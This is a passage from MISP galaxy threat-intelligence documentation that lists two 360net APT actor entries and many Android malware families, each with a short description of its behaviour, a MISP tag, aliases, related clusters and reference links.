Table 40. Table References

Links

北非狐 - APT-C-44

The 北非狐 (North African Fox) group (APT-C-44) is an overseas APT group from Algeria that has been active for 3 years. It conducts cyber espionage mainly in the Middle East, primarily to steal sensitive information. Its attacks date back to November 2017 and it remains active.

The tag is: misp-galaxy:360net-threat-actor="北非狐 - APT-C-44"

Table 41. Table References

Links

https://apt.360.net/report/apts/157.html

WellMess - APT-C-42

WELLMESS is a relatively new Russian-speaking overseas APT group, first discovered in 2017 and active since. It conducts espionage attacks mainly against Asia, has run a supply-chain attack lasting more than two years, and has exploit capability. Its targets are mainly government, IT and research organisations, and its primary aim is file theft.

The tag is: misp-galaxy:360net-threat-actor="WellMess - APT-C-42"

Table 42. Table References

Links

https://apt.360.net/report/apts/136.html

Android

Android malware galaxy based on multiple open sources.

Android is a cluster galaxy available in JSON format. The JSON can be freely reused in your application or automatically enabled in MISP.
authors

Unknown

CopyCat

CopyCat is a fully developed malware with vast capabilities, including rooting devices, establishing persistency, and injecting code into Zygote – a daemon responsible for launching apps in the Android operating system – that allows the malware to control any activity on the device.

The tag is: misp-galaxy:android="CopyCat"

Table 43. Table References

Links

https://blog.checkpoint.com/2017/07/06/how-the-copycat-malware-infected-android-devices-around-the-world/

Andr/Dropr-FH

Andr/Dropr-FH can silently record audio and video, monitor texts and calls, modify files, and ultimately spawn ransomware.

The tag is: misp-galaxy:android="Andr/Dropr-FH"

Andr/Dropr-FH is also known as:

  • GhostCtrl

Andr/Dropr-FH has relationships with:

  • similar: misp-galaxy:malpedia="GhostCtrl" with estimative-language:likelihood-probability="likely"

Table 44. Table References

Links

https://nakedsecurity.sophos.com/2017/07/21/watch-out-for-the-android-malware-that-snoops-on-your-phone/

https://www.neowin.net/news/the-ghostctrl-android-malware-can-silently-record-your-audio-and-steal-sensitive-data

Judy

The malware, dubbed Judy, is an auto-clicking adware which was found on 41 apps developed by a Korean company. The malware uses infected devices to generate large amounts of fraudulent clicks on advertisements, generating revenues for the perpetrators behind it.

The tag is: misp-galaxy:android="Judy"

Table 45. Table References

Links

http://fortune.com/2017/05/28/android-malware-judy/

https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/

RedAlert2

The trojan waits in hiding until the user opens a banking or social media app. When this happens, the trojan shows an HTML-based overlay on top of the original app, alerting the user of an error, and asking to reauthenticate. Red Alert then collects the user’s credentials and sends them to its C&C server.

The tag is: misp-galaxy:android="RedAlert2"

RedAlert2 has relationships with:

  • similar: misp-galaxy:malpedia="RedAlert2" with estimative-language:likelihood-probability="likely"

Table 46. Table References

Links

https://www.bleepingcomputer.com/news/security/researchers-discover-new-android-banking-trojan/

https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html

Tizi

Tizi is a fully featured backdoor that installs spyware to steal sensitive data from popular social media applications. The Google Play Protect security team discovered this family in September 2017 when device scans found an app with rooting capabilities that exploited old vulnerabilities. The team used this app to find more applications in the Tizi family, the oldest of which is from October 2015. The Tizi app developer also created a website and used social media to encourage more app installs from Google Play and third-party websites.

The tag is: misp-galaxy:android="Tizi"

Table 47. Table References

Links

https://security.googleblog.com/2017/11/tizi-detecting-and-blocking-socially.html

DoubleLocker

DoubleLocker can change the device's PIN, preventing victims from accessing their devices, and also encrypts their data and demands a ransom. After being installed by impersonating Adobe Flash Player, it misuses accessibility services, similar to BankBot.

The tag is: misp-galaxy:android="DoubleLocker"

DoubleLocker has relationships with:

  • similar: misp-galaxy:malpedia="DoubleLocker" with estimative-language:likelihood-probability="likely"

Table 48. Table References

Links

https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/

Svpeng

Svpeng is a banking trojan that acts as a keylogger. If the device language is not Russian, Svpeng asks for permission to use accessibility services. By abusing this service it gains administrator rights, allowing it to draw over other apps, send and receive SMS, and take screenshots when keys are pressed.

The tag is: misp-galaxy:android="Svpeng"

Svpeng is also known as:

  • Invisible Man

Svpeng has relationships with:

  • similar: misp-galaxy:tool="Svpeng" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Svpeng" with estimative-language:likelihood-probability="likely"

Table 49. Table References

Links

https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/

https://www.theregister.co.uk/2017/08/02/banking_android_malware_in_uk/

LokiBot

LokiBot is a banking trojan for Android 4.0 and higher. It can steal information and send SMS messages. It can start web browsers and banking applications, and shows notifications impersonating other apps. On an attempt to remove it, it encrypts the device's external storage and demands Bitcoin to decrypt the files.

The tag is: misp-galaxy:android="LokiBot"

LokiBot has relationships with:

  • similar: misp-galaxy:malpedia="Loki Password Stealer (PWS)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="LokiBot" with estimative-language:likelihood-probability="likely"

Table 50. Table References

Links

https://clientsidedetection.com/lokibot_the_first_hybrid_android_malware.html

BankBot

The main goal of this malware is to steal banking credentials from the victim's device. It usually impersonates Flash Player updaters, Android system tools or other legitimate applications.

The tag is: misp-galaxy:android="BankBot"

BankBot has relationships with:

  • similar: misp-galaxy:malpedia="Anubis (Android)" with estimative-language:likelihood-probability="likely"

Table 51. Table References

Links

https://blog.fortinet.com/2017/09/19/a-look-into-the-new-strain-of-bankbot

https://forensics.spreitzenbarth.de/android-malware/

https://blog.avast.com/mobile-banking-trojan-sneaks-into-google-play-targeting-wells-fargo-chase-and-citibank-customers

Viking Horde

On rooted devices, Viking Horde installs software and executes code remotely to gain access to the mobile data.

The tag is: misp-galaxy:android="Viking Horde"

Table 52. Table References

Links

http://www.alwayson-network.com/worst-types-android-malware-2016/

HummingBad

A Chinese advertising company has developed this malware. The malware has the power to take control of devices; it forces users to click advertisements and download apps. The malware uses a multistage attack chain.

The tag is: misp-galaxy:android="HummingBad"

HummingBad has relationships with:

  • similar: misp-galaxy:mitre-malware="HummingBad - S0322" with estimative-language:likelihood-probability="likely"

Table 53. Table References

Links

http://www.alwayson-network.com/worst-types-android-malware-2016/

http://blog.checkpoint.com/wp-content/uploads/2016/07/HummingBad-Research-report_FINAL-62916.pdf

Ackposts

Ackposts is a Trojan horse for Android devices that steals the Contacts information from the compromised device and sends it to a predetermined location.

The tag is: misp-galaxy:android="Ackposts"

Table 54. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-072302-3943-99

Wirex

Wirex is a Trojan horse for Android devices that opens a backdoor on the compromised device which then joins a botnet for conducting click fraud.

The tag is: misp-galaxy:android="Wirex"

Table 55. Table References

Links

https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/

http://www.zdnet.com/article/wirex-ddos-malware-given-udp-flood-capabilities/

WannaLocker

WannaLocker is a strain of ransomware for Android devices that encrypts files on the device’s external storage and demands a payment to decrypt them.

The tag is: misp-galaxy:android="WannaLocker"

Table 56. Table References

Links

https://fossbytes.com/wannalocker-ransomware-wannacry-android/

Switcher

Switcher is a Trojan horse for Android devices that modifies Wi-Fi router DNS settings. Switcher attempts to infiltrate the admin interface of the router on the device's Wi-Fi network using brute-force techniques. If the attack succeeds, Switcher alters the router's DNS settings, making it possible to reroute DNS queries to a network controlled by the malicious actors.

The tag is: misp-galaxy:android="Switcher"

Switcher has relationships with:

  • similar: misp-galaxy:malpedia="Switcher" with estimative-language:likelihood-probability="likely"

Table 57. Table References

Links

http://www.zdnet.com/article/this-android-infecting-trojan-malware-uses-your-phone-to-attack-your-router/

https://www.theregister.co.uk/2017/01/03/android_trojan_targets_routers/

https://www.symantec.com/security_response/writeup.jsp?docid=2017-090410-0547-99

Vibleaker

Vibleaker was an app available on the Google Play Store named Beaver Gang Counter that contained malicious code which, on specific orders from its maker, would scan the user's phone for the Viber app and then steal photos and videos recorded or sent through the app.

The tag is: misp-galaxy:android="Vibleaker"

Table 58. Table References

Links

http://news.softpedia.com/news/malicious-android-app-steals-viber-photos-and-BankBot-505758.shtml

ExpensiveWall

ExpensiveWall is Android malware that sends fraudulent premium SMS messages and charges users' accounts for fake services without their knowledge.

The tag is: misp-galaxy:android="ExpensiveWall"

Table 59. Table References

Links

https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/

http://fortune.com/2017/09/14/google-play-android-malware/

Cepsohord

Cepsohord is a Trojan horse for Android devices that uses compromised devices to commit click fraud, modify DNS settings, randomly delete essential files, and download additional malware such as ransomware.

The tag is: misp-galaxy:android="Cepsohord"

Table 60. Table References

Links

https://www.cyber.nj.gov/threat-profiles/android-malware-variants/cepsohord

Fakem Rat

Fakem RAT makes its network traffic look like well-known protocols (e.g. Messenger traffic, HTML pages).

The tag is: misp-galaxy:android="Fakem Rat"

Table 61. Table References

Links

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-fakem-rat.pdf

https://www.symantec.com/security_response/writeup.jsp?docid=2016-012608-1538-99

GM Bot

GM Bot – also known as Acecard, SlemBunk, or Bankosy – scams people into giving up their banking log-in credentials and other personal data by displaying overlays that look nearly identical to banking apps' log-in pages. Subsequently, the malware intercepts SMS to obtain two-factor authentication PINs, giving cybercriminals full access to bank accounts.

The tag is: misp-galaxy:android="GM Bot"

GM Bot is also known as:

  • Acecard

  • SlemBunk

  • Bankosy

GM Bot has relationships with:

  • similar: misp-galaxy:tool="Slempo" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Bankosy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Slempo" with estimative-language:likelihood-probability="likely"

Table 62. Table References

Links

https://blog.avast.com/android-trojan-gm-bot-is-evolving-and-targeting-more-than-50-banks-worldwide

Moplus

The Wormhole vulnerability in the Moplus SDK could be exploited by hackers to open an unsecured and unauthenticated HTTP server connection on the user’s device, and this connection is established in the background without the user’s knowledge.

The tag is: misp-galaxy:android="Moplus"

Table 63. Table References

Links

http://securityaffairs.co/wordpress/41681/hacking/100m-android-device-baidu-moplus-sdk.html

Adwind

Adwind is a backdoor written purely in Java that targets systems supporting the Java runtime environment. Its commands can be used, among other things, to display messages on the system, open URLs, update the malware, download/execute files, and download/load plugins. According to the author, the backdoor component can run on Windows, Mac OS, Linux and Android platforms, providing rich capabilities for remote control, data gathering, data exfiltration and lateral movement.

The tag is: misp-galaxy:android="Adwind"

Adwind is also known as:

  • AlienSpy

  • Frutas

  • Unrecom

  • Sockrat

  • Jsocket

  • jRat

  • Backdoor:Java/Adwind

Adwind has relationships with:

  • similar: misp-galaxy:rat="Adwind RAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Adwind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Sockrat" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="AdWind" with estimative-language:likelihood-probability="likely"

Table 64. Table References

Links

https://securelist.com/adwind-faq/73660/

AdSms

AdSms is a Trojan horse that may send SMS messages from Android devices.

The tag is: misp-galaxy:android="AdSms"

Table 65. Table References

Links

https://www.fortiguard.com/encyclopedia/virus/7389670

https://www.symantec.com/security_response/writeup.jsp?docid=2011-051313-4039-99

Airpush

Airpush is a very aggressive ad network.

The tag is: misp-galaxy:android="Airpush"

Airpush is also known as:

  • StopSMS

Table 66. Table References

Links

https://crypto.stanford.edu/cs155old/cs155-spring16/lectures/18-mobile-malware.pdf

BeanBot

BeanBot forwards the device's data to a remote server and sends out premium-rate SMS messages from the infected device.

The tag is: misp-galaxy:android="BeanBot"

Table 67. Table References

Links

https://www.f-secure.com/v-descs/trojan_android_beanbot.shtml

Kemoge

Kemoge is adware that disguises itself as popular apps via repackaging, then allows for a complete takeover of the user's Android device.

The tag is: misp-galaxy:android="Kemoge"

Kemoge has relationships with:

  • similar: misp-galaxy:mitre-malware="ShiftyBug - S0294" with estimative-language:likelihood-probability="likely"

Table 68. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/10/kemoge_another_mobi.html

https://www.symantec.com/security_response/writeup.jsp?docid=2015-101207-3555-99

Ghost Push

Ghost Push is a family of malware that infects the Android OS by automatically gaining root access, downloading malicious software, masquerading as a system app, and then losing root access, which then makes it virtually impossible to remove the infection even by factory reset unless the firmware is reflashed.

The tag is: misp-galaxy:android="Ghost Push"

Table 69. Table References

Links

https://en.wikipedia.org/wiki/Ghost_Push

https://blog.avast.com/how-to-protect-your-android-device-from-ghost-push

BeNews

The BeNews app is a backdoor app that uses the name of defunct news site BeNews to appear legitimate. After installation it bypasses restrictions and downloads additional threats to the compromised device.

The tag is: misp-galaxy:android="BeNews"

Table 70. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/fake-news-app-in-hacking-team-dump-designed-to-bypass-google-play/

Accstealer

Accstealer is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Accstealer"

Table 71. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-012711-1159-99

Acnetdoor

Acnetdoor is a detection for Trojan horses on the Android platform that open a back door on the compromised device.

The tag is: misp-galaxy:android="Acnetdoor"

Table 72. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051611-4258-99

Acnetsteal

Acnetsteal is a detection for Trojan horses on the Android platform that steal information from the compromised device.

The tag is: misp-galaxy:android="Acnetsteal"

Table 73. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051612-0505-99

Actech

Actech is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Actech"

Table 74. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-080111-3948-99

AdChina

AdChina is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AdChina"

Table 75. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032814-2947-99

Adfonic

Adfonic is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Adfonic"

Table 76. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052615-0024-99

AdInfo

AdInfo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AdInfo"

Table 77. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-2433-99

Adknowledge

Adknowledge is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Adknowledge"

Table 78. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052822-1033-99

AdMarvel

AdMarvel is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AdMarvel"

Table 79. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-060621-2450-99

AdMob

AdMob is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AdMob"

Table 80. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052822-3437-99

Adrd

Adrd is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Adrd"

Table 81. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-021514-4954-99

Aduru

Aduru is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Aduru"

Table 82. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052618-2419-99

Adwhirl

Adwhirl is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Adwhirl"

Table 83. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052918-1414-99

Adwlauncher

Adwlauncher is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Adwlauncher"

Table 84. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-082308-1823-99

Adwo

Adwo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Adwo"

Table 85. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032814-5806-99

Airad

Airad is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Airad"

Table 86. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-1704-99

Alienspy

Alienspy is a Trojan horse for Android devices that steals information from the compromised device. It may also download potentially malicious files.

The tag is: misp-galaxy:android="Alienspy"

Table 87. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-042714-5942-99

AmazonAds

AmazonAds is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AmazonAds"

Table 88. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052618-5002-99

Answerbot

Answerbot is a Trojan horse that opens a back door on Android devices.

The tag is: misp-galaxy:android="Answerbot"

Table 89. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-100711-2129-99

Antammi

Antammi is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Antammi"

Table 90. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-032106-5211-99

Apkmore

Apkmore is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Apkmore"

Table 91. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040113-4813-99

Aplog

Aplog is a Trojan horse for Android devices that steals information from the device.

The tag is: misp-galaxy:android="Aplog"

Table 92. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-100911-1023-99

Appenda

Appenda is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Appenda"

Table 93. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-062812-0516-99

Apperhand

Apperhand is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Apperhand"

Table 94. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-5637-99

Appleservice

Appleservice is a Trojan horse for Android devices that may steal information from the compromised device.

The tag is: misp-galaxy:android="Appleservice"

Table 95. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031011-4321-99

AppLovin

AppLovin is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AppLovin"

Table 96. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040112-1739-99

Arspam

Arspam is a Trojan horse for Android devices that sends spam SMS messages to contacts on the compromised device.

The tag is: misp-galaxy:android="Arspam"

Table 97. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-121915-3251-99

Aurecord

Aurecord is a spyware application for Android devices that allows the device it is installed on to be monitored.

The tag is: misp-galaxy:android="Aurecord"

Table 98. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031914-2310-99

Backapp

Backapp is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Backapp"

Table 99. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-092708-5017-99

Backdexer

Backdexer is a Trojan horse for Android devices that may send premium-rate SMS messages from the compromised device.

The tag is: misp-galaxy:android="Backdexer"

Table 100. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-121812-2502-99

Backflash

Backflash is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Backflash"

Table 101. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-091714-0427-99

Backscript

Backscript is a Trojan horse for Android devices that downloads files onto the compromised device.

The tag is: misp-galaxy:android="Backscript"

Table 102. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-090704-3639-99

Badaccents

Badaccents is a Trojan horse for Android devices that may download apps on the compromised device.

The tag is: misp-galaxy:android="Badaccents"

Table 103. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-123015-3618-99

Badpush

Badpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Badpush"

Table 104. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040311-4133-99

Ballonpop

Ballonpop is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Ballonpop"

Table 105. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-120911-1731-99

Bankosy

Bankosy is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Bankosy"

Bankosy has relationships with:

  • similar: misp-galaxy:tool="Slempo" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="GM Bot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Slempo" with estimative-language:likelihood-probability="likely"

Table 106. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-072316-5249-99

Bankun

Bankun is a Trojan horse for Android devices that replaces certain banking applications on the compromised device.

The tag is: misp-galaxy:android="Bankun"

Table 107. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-072318-4143-99

Basebridge

Basebridge is a Trojan horse that attempts to send premium-rate SMS messages to predetermined numbers.

The tag is: misp-galaxy:android="Basebridge"

Table 108. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-060915-4938-99

Basedao

Basedao is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Basedao"

Table 109. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-061715-3303-99

Batterydoctor

Batterydoctor is a Trojan that makes exaggerated claims about the device's ability to recharge the battery, as well as stealing information.

The tag is: misp-galaxy:android="Batterydoctor"

Table 110. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-101916-0847-99

Beaglespy

Beaglespy is an Android mobile detection for the Beagle spyware program as well as its associated client application.

The tag is: misp-galaxy:android="Beaglespy"

Table 111. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-091010-0627-99

Becuro

Becuro is a Trojan horse for Android devices that downloads potentially malicious files onto the compromised device.

The tag is: misp-galaxy:android="Becuro"

Table 112. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-051410-3348-99

Beita

Beita is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Beita"

Table 113. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-110111-1829-99

Bgserv

Bgserv is a Trojan that opens a back door and transmits information from the device to a remote location.

The tag is: misp-galaxy:android="Bgserv"

Table 114. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-031005-2918-99

Biigespy

Biigespy is an Android mobile detection for the Biige spyware program as well as its associated client application.

The tag is: misp-galaxy:android="Biigespy"

Table 115. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-091012-0526-99

Bmaster

Bmaster is a Trojan horse on the Android platform that opens a back door, downloads files and steals potentially confidential information from the compromised device.

The tag is: misp-galaxy:android="Bmaster"

Table 116. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-020609-3003-99

Bossefiv

Bossefiv is a Trojan horse for Android devices that steals information.

The tag is: misp-galaxy:android="Bossefiv"

Table 117. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-061520-4322-99

Boxpush

Boxpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Boxpush"

Table 118. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-4613-99

Burstly

Burstly is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Burstly"

Table 119. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052918-1443-99

Buzzcity

Buzzcity is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Buzzcity"

Table 120. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052918-1454-99

ByPush

ByPush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="ByPush"

Table 121. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040315-4708-99

Cajino

Cajino is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Cajino"

Table 122. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-040210-3746-99

Casee

Casee is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Casee"

Table 123. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052919-3501-99

Catchtoken

Catchtoken is a Trojan horse for Android devices that intercepts SMS messages and opens a back door on the compromised device.

The tag is: misp-galaxy:android="Catchtoken"

Table 124. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-121619-0548-99

Cauly

Cauly is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Cauly"

Table 125. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052919-3454-99

Cellshark

Cellshark is a spyware application for Android devices that periodically gathers information from the device and uploads it to a predetermined location.

The tag is: misp-galaxy:android="Cellshark"

Table 126. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-111611-0914-99

Centero

Centero is a Trojan horse for Android devices that displays advertisements on the compromised device.

The tag is: misp-galaxy:android="Centero"

Table 127. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-053006-2502-99

Chuli

Chuli is a Trojan horse for Android devices that opens a back door and may steal information from the compromised device.

The tag is: misp-galaxy:android="Chuli"

Table 128. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-032617-1604-99

Citmo

Citmo is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Citmo"

Table 129. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030715-5012-99

Claco

Claco is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Claco"

Table 130. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-020415-5600-99

Clevernet

Clevernet is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Clevernet"

Table 131. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-5257-99

Cnappbox

Cnappbox is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Cnappbox"

Table 132. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040215-1141-99

Cobblerone

Cobblerone is a spyware application for Android devices that can track the phone’s location and remotely erase the device.

The tag is: misp-galaxy:android="Cobblerone"

Table 133. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-111514-3846-99

Coolpaperleak

Coolpaperleak is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Coolpaperleak"

Table 134. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-080211-5757-99

Coolreaper

Coolreaper is a Trojan horse for Android devices that opens a back door on the compromised device. It may also steal information and download potentially malicious files.

The tag is: misp-galaxy:android="Coolreaper"

Table 135. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-011220-3211-99

Cosha

Cosha is a spyware program for Android devices that monitors and sends certain information to a remote location.

The tag is: misp-galaxy:android="Cosha"

Table 136. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-081712-5231-99

Counterclank

Counterclank is a Trojan horse for Android devices that steals information.

The tag is: misp-galaxy:android="Counterclank"

Table 137. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-012709-4046-99

Crazymedia

Crazymedia is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Crazymedia"

Table 138. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-2547-99

Crisis

Crisis is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Crisis"

Crisis has relationships with:

  • similar: misp-galaxy:malpedia="RCS" with estimative-language:likelihood-probability="likely"

Table 139. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-071409-0636-99

Crusewind

Crusewind is a Trojan horse for Android devices that sends SMS messages to a premium-rate number.

The tag is: misp-galaxy:android="Crusewind"

Table 140. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-070301-5702-99

Dandro

Dandro is a Trojan horse for Android devices that allows a remote attacker to gain control over the device and steal information from it.

The tag is: misp-galaxy:android="Dandro"

Table 141. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-012916-2128-99

Daoyoudao

Daoyoudao is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Daoyoudao"

Table 142. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040214-5018-99

Deathring

Deathring is a Trojan horse for Android devices that may perform malicious activities on the compromised device.

The tag is: misp-galaxy:android="Deathring"

Table 143. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-121116-4547-99

Deeveemap

Deeveemap is a Trojan horse for Android devices that downloads potentially malicious files onto the compromised device.

The tag is: misp-galaxy:android="Deeveemap"

Table 144. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2017-060907-5221-99

Dendoroid

Dendoroid is a Trojan horse for Android devices that opens a back door, steals information, and may perform other malicious activities on the compromised device.

The tag is: misp-galaxy:android="Dendoroid"

Table 145. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030418-2633-99

Dengaru

Dengaru is a Trojan horse for Android devices that performs click-fraud from the compromised device.

The tag is: misp-galaxy:android="Dengaru"

Table 146. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-051113-4819-99

Diandong

Diandong is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Diandong"

Table 147. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-2453-99

Dianjin

Dianjin is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Dianjin"

Table 148. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-0313-99

Dogowar

Dogowar is a Trojan horse on the Android platform that sends SMS texts to all contacts on the device. It is a repackaged version of a game application called Dog Wars, which can be downloaded from a third party market and must be manually installed.

The tag is: misp-galaxy:android="Dogowar"

Table 149. Table References

Links

